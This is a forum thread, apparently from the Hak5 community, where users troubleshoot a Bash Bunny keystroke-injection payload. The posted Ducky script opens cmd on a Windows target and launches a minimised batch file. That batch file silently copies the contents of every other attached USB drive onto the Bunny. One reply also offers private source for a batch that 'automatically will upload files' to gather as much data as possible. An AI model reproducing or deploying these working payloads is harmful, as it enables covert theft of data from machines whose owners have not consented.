Jump to content

How run batch file


Natha_n
 Share

Recommended Posts

There is no command in Ducky script that I know of that can start a batch script on a Windows host. I guess that you want to store the batch script file that you have posted in the other thread on the Bunny, but you want to execute it in the perspective of the Windows target machine. In other words, the Windows target PC should start the bat file from the Bunny storage. To do this you need to get the drive letter of the Bunny (the way I showed you in the other thread), but not using PowerShell since that's a limitation in your target system. This is possible to do without PowerShell if using wmic. It's not that pretty, but it works.

Link to comment
Share on other sites

If the batch can be execute in one single line that you can execute cmd.exe /c
---------------

This i know the folks at hak5.org don't know this trick but you can execute a batch that automatically will upload files from the machine or execute batch to get as much data as you can. (I have the source) pm me. 

Link to comment
Share on other sites

I wrote the payload.txt and the script.bat. Can you tell me if they are correct. For the payload I don't know how to use the switch position (I got it but I didn't use it after)

payload.txt

DUCKY_LANG us
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
GUI
DELAY 100
STRING cmd.exe
ENTER
DELAY 100
STRING for /f "tokens=2 delims==" %b IN ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') DO SET letter_BashBunny=%b
ENTER
STRING %letter_BashBunny%
ENTER
STRING cd %letter_BashBunny%\payloads\
ENTER
STRING start /min script.bat
ENTER
STRING exit
ENTER
LED FINISH

script.bat

@echo off
MKDIR %~dp0\copy_directory
FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO (
    SET usb_key=%%u
    XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_directory\"
)

Thaks for your replies !

Link to comment
Share on other sites

  • 4 weeks later...

Hi,
After many attempts and a lot of reading on the subject, I don't understand why my payload does not work.
Everything runs normally until you type the command in the cmd.

command:

Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b

 

If I do another command like cls it works.
Do you have an idea ?

 

ATTACKMODE HID STORAGE
LED R
Q GUI
Q DELAY 100
Q STRING cmd.exe
Q ENTER
Q DELAY 100
Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b
Q ENTER
Q DELAY 5
Q STRING %letter_BashBunny%
Q ENTER
Q DELAY 5
Q STRING cd %letter_BashBunny%\payloads\
Q ENTER
Q DELAY5
Q STRING start /min script.bat
Q ENTER
Q DELAY 5
Q STRING exit
Q ENTER
LED G

 

Link to comment
Share on other sites

The Ducky script documentation is a bit scattered around according to me. If you use the Croc, that also use Ducky script, it's a bit easier to find since you most often remember that you have seen it somewhere. Payloads on GitHub may also be a source of knowledge.

The Croc documentation has some info about escaping chars, not complete though as I see it, but always something.

https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands

Other than that, it's all about trying. Trial and error has worked before in computing history and is still alive as a working method.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...